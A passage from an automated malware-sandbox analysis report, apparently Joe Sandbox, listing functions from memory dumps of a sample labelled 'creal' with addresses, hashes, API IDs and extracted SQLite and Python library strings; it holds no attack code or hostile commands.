                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cb80ad11c98d76827863cb71e74507b593be2b67b62d800d4c12a6864baf513
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D31C571E1DB8382EB5E8B95E89477D23A1AF45BD8F485034C92D477A4EE3CE484D702
                                                                                                                                                                                                                Function 00007FF8E7143880 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_$Back_ChainCode_EmptyExceptions1FetchFrame_HereRestoreState_ThreadTrace
                                                                                                                                                                                                                • String ID: charset_normalizer\md.py
                                                                                                                                                                                                                • API String ID: 1599779757-1392889821
                                                                                                                                                                                                                • Opcode ID: 929c761034df64e23572057a73fe2c5fab85c31af172243b9a7b6395f97a8051
                                                                                                                                                                                                                • Instruction ID: 284577ce898234f8246775bf867ad1e74b06aaa407287b3ec6dbece14f6002a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 929c761034df64e23572057a73fe2c5fab85c31af172243b9a7b6395f97a8051
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6212C36A08B82C1EB148B91E84436DA7B1FB89BD5F440031DA6E53B64EF3CE544C702
                                                                                                                                                                                                                Function 00007FF8E7146E20 Relevance: 18.1, APIs: 12, Instructions: 104threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2819143443-0
                                                                                                                                                                                                                • Opcode ID: 34ec5bebfffadac6be9bf9876dce8c975bd5e57f5d382802bd6aac2d38012139
                                                                                                                                                                                                                • Instruction ID: 0814a9b5817e47cd53f8c47c5bfb353bc9f1f57dda866ac68954c06fcc4c933e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34ec5bebfffadac6be9bf9876dce8c975bd5e57f5d382802bd6aac2d38012139
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6251B432908742C1EB598FA4D86837C22F1AB44BFDF144334DA7A522D8EF7EE4858342
                                                                                                                                                                                                                Function 00007FF8E692B670 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 386COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                • API String ID: 0-3733955532
                                                                                                                                                                                                                • Opcode ID: e8e5a8eb5bbe4c9cdfe345609da715942a7d6ed5573c78f20b4feb771ef1efc9
                                                                                                                                                                                                                • Instruction ID: 125a438efc341117b903f025bd320b60b65acfe181b1de6ca42b66c54ba483f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8e5a8eb5bbe4c9cdfe345609da715942a7d6ed5573c78f20b4feb771ef1efc9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C02A165F29A8281EA54AF91F498379A3E8FF55BC8F084135DE5E063A9DF3CE454C302
                                                                                                                                                                                                                Function 00007FF8E6FB1030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577473923.00007FF8E6FB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF8E6FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577410915.00007FF8E6FB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577517217.00007FF8E6FB2000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577555444.00007FF8E6FB4000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fb0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                • Opcode ID: b83bcfdbda2627b91fecea52bb080c46b8b041ebfc422aeaa466320814e2d747
                                                                                                                                                                                                                • Instruction ID: f7fc004afdee1ac81ce3625b8874906a7de450e832f43981b7a38d7da37b32e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b83bcfdbda2627b91fecea52bb080c46b8b041ebfc422aeaa466320814e2d747
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C818D61E3C24F86FA50EBE6A8493F97295AF967C0F5C4135DA0C83796DE3DE4068702
                                                                                                                                                                                                                Function 00007FF8E6F31030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575627628.00007FF8E6F31000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8E6F30000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575586394.00007FF8E6F30000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575707674.00007FF8E6F33000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575751750.00007FF8E6F35000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6f30000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                • Opcode ID: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
                                                                                                                                                                                                                • Instruction ID: 79bfb16e75fc15732000c11a67e2c1269e460b3087aec59201e55e7314ebc321
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21817A71EAC24FC6FA50EBE6A5493F97290AF96BC0F444435D90C87796DE2CE8468702
                                                                                                                                                                                                                Function 00007FF8E6FC1030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577634657.00007FF8E6FC1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF8E6FC0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577585028.00007FF8E6FC0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577691044.00007FF8E6FC3000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577732223.00007FF8E6FC4000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577775069.00007FF8E6FC5000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fc0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                • Opcode ID: 36ee1f5b3c6c56bb94e458d277562ecc12df9e8aa7007938e90fb84e13c3be66
                                                                                                                                                                                                                • Instruction ID: d2bfa938ea9d487713798708ca835cb780e9ee50f7d8cfc6918852af4dbb7d6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36ee1f5b3c6c56bb94e458d277562ecc12df9e8aa7007938e90fb84e13c3be66
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5581B161E3C64FAAFB50EBE994493F932A0AF967C0F444135D90D43796DE3CE426870A
                                                                                                                                                                                                                Function 00007FF8E6F11030 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575166000.00007FF8E6F11000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FF8E6F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575122286.00007FF8E6F10000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575218759.00007FF8E6F16000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575264792.00007FF8E6F1B000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6f10000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                • Opcode ID: 474c6b7a685372b53d5ee10a3ee998af2d98c0b67a4930f1a88a30a85650b8b9
                                                                                                                                                                                                                • Instruction ID: 087e3a02b450ca7c4fbd396637f470f8098c6278e3944c3f404c883a9ea2d90c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 474c6b7a685372b53d5ee10a3ee998af2d98c0b67a4930f1a88a30a85650b8b9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62817821E3C24F86FA50EBE694493F972A4AF96BC0F544039D90C97797DE2CEC468702
                                                                                                                                                                                                                Function 00007FF8E7144820 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$FromLong_Ssize_t$Err_ItemObject_Slice_String
                                                                                                                                                                                                                • String ID: interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 575668516-2110327174
                                                                                                                                                                                                                • Opcode ID: 4e2baef39ba8fe060f07d6d6f0bced05c2d01185e87a098f7d4dafbc9954950d
                                                                                                                                                                                                                • Instruction ID: 9ff814652e80f57663e9d910129cdec26b6e2bb13e30234bd84e203424d46400
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e2baef39ba8fe060f07d6d6f0bced05c2d01185e87a098f7d4dafbc9954950d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75415232E09B83C5EA588FA5E95537C2392AF49BE0F484130DE7E467D4EF2CE4569702
                                                                                                                                                                                                                Function 00007FF8E714F2F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$Dict_ErrorFromItemLong_Number_ObjectObject_OccurredSsize_tVectorcallWith
                                                                                                                                                                                                                • String ID: bool$feed
                                                                                                                                                                                                                • API String ID: 2189706420-2849697477
                                                                                                                                                                                                                • Opcode ID: 8e0caade2916fc91190bf6248451af5af673b86bd580171c2b13f121ea62ae45
                                                                                                                                                                                                                • Instruction ID: 5542aefbf52031092bc510ee7f8028f3233a3622fd52556fd9c497e5168941df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e0caade2916fc91190bf6248451af5af673b86bd580171c2b13f121ea62ae45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A414731A09B82C1EB649B95E94437D63A5EF48BC5F5C4031DAAE47BA5EF2CF440C712
                                                                                                                                                                                                                Function 00007FF8E714A720 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
                                                                                                                                                                                                                • String ID: bool$feed
                                                                                                                                                                                                                • API String ID: 2902451266-2849697477
                                                                                                                                                                                                                • Opcode ID: f4f92837b73cd07083ecf196f641edd5c5d76e013ce287cc97f39c4dfbe217e1
                                                                                                                                                                                                                • Instruction ID: 8cd766a4b4a258a1306b2c7c942c5d23db118fa53398e1aafe0f3b23cfe21ac6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4f92837b73cd07083ecf196f641edd5c5d76e013ce287cc97f39c4dfbe217e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A415935A09B93C1EA248F91E85537D63A1FF48BC5F494031DA6E47755EF2DE4428312
                                                                                                                                                                                                                Function 00007FF8E714A110 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$Dict_ErrorFromItemLong_Number_ObjectObject_OccurredSsize_tVectorcallWith
                                                                                                                                                                                                                • String ID: bool$feed
                                                                                                                                                                                                                • API String ID: 2189706420-2849697477
                                                                                                                                                                                                                • Opcode ID: 958a22a6337853555e897f1e5a14fcd0471710981ec55253fe3441e9c772aafb
                                                                                                                                                                                                                • Instruction ID: fb8dd353d0b69ef4abebd0b154c4f6885d4954a0ae4b61f77b47d83b2b9cbbb8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 958a22a6337853555e897f1e5a14fcd0471710981ec55253fe3441e9c772aafb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D416A36A09B52C2EA28DB91E95037D73A1FF48BC4F184030DA6E07BA5EF2DF4409302
                                                                                                                                                                                                                Function 00007FF8E714F0E0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
                                                                                                                                                                                                                • String ID: bool$eligible
                                                                                                                                                                                                                • API String ID: 2902451266-3320767611
                                                                                                                                                                                                                • Opcode ID: eacaf991cd320d3b28d9c0a86148e8b297e2767c2de5e507dac64fabba49b49f
                                                                                                                                                                                                                • Instruction ID: 4074b63d5fa170c28730ef612ccde8944a2aa60ac412cd20e0fa642581e63e32
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eacaf991cd320d3b28d9c0a86148e8b297e2767c2de5e507dac64fabba49b49f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83311832A09BC2C1EA588B95E98437D63B6EF44FC5F585031DA6D47764EF2CE4419702
                                                                                                                                                                                                                Function 00007FF8E68C2430 Relevance: 15.5, APIs: 4, Strings: 6, Instructions: 477COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$PRAGMA "%w".page_count$misuse
                                                                                                                                                                                                                • API String ID: 438689982-3885987512
                                                                                                                                                                                                                • Opcode ID: cebb2252c8a6daa73a7a3e11162983c79d16766bc1e1919f8db95f9199afc267
                                                                                                                                                                                                                • Instruction ID: c739bfe9c4cd2efe1421105fbbe572c1297d476050701a2019232018056bc514
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cebb2252c8a6daa73a7a3e11162983c79d16766bc1e1919f8db95f9199afc267
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D12BF25B29A66A1EA68EBA5956477923A1FF84FC8F184131CE0D077D9DF3CE445C303
                                                                                                                                                                                                                Function 00007FF8E68E9F70 Relevance: 15.3, APIs: 2, Strings: 8, Instructions: 330COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                • API String ID: 3510742995-875588658
                                                                                                                                                                                                                • Opcode ID: d5dff3e84e1e23a8fc53c32058c43ab8a5c4bbbe5e67989a0810bec810ea8e84
                                                                                                                                                                                                                • Instruction ID: 5b13359fe6873c95412596242108d75bbb6d803c3ef1eaff6db34929aa2feecd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5dff3e84e1e23a8fc53c32058c43ab8a5c4bbbe5e67989a0810bec810ea8e84
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2E18372F286669AFB20DBF5D8443BD37A0AB05BC8F044136DE1E63695DE7CA845C342
                                                                                                                                                                                                                Function 00007FF8E6905FB0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 325COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • Cannot add a column with non-constant default, xrefs: 00007FF8E69061AF
                                                                                                                                                                                                                • Cannot add a UNIQUE column, xrefs: 00007FF8E69060E3
                                                                                                                                                                                                                • Cannot add a PRIMARY KEY column, xrefs: 00007FF8E69060C8
                                                                                                                                                                                                                • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FF8E690635C
                                                                                                                                                                                                                • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE quick_check GLOB 'CHECK*' OR quick_check GLOB 'NULL*', xrefs: 00007FF8E6906491
                                                                                                                                                                                                                • cannot add a STORED column, xrefs: 00007FF8E69062B4
                                                                                                                                                                                                                • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FF8E6906155
                                                                                                                                                                                                                • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FF8E690613D, 00007FF8E69061B9, 00007FF8E69062C3
                                                                                                                                                                                                                • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FF8E6906133
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
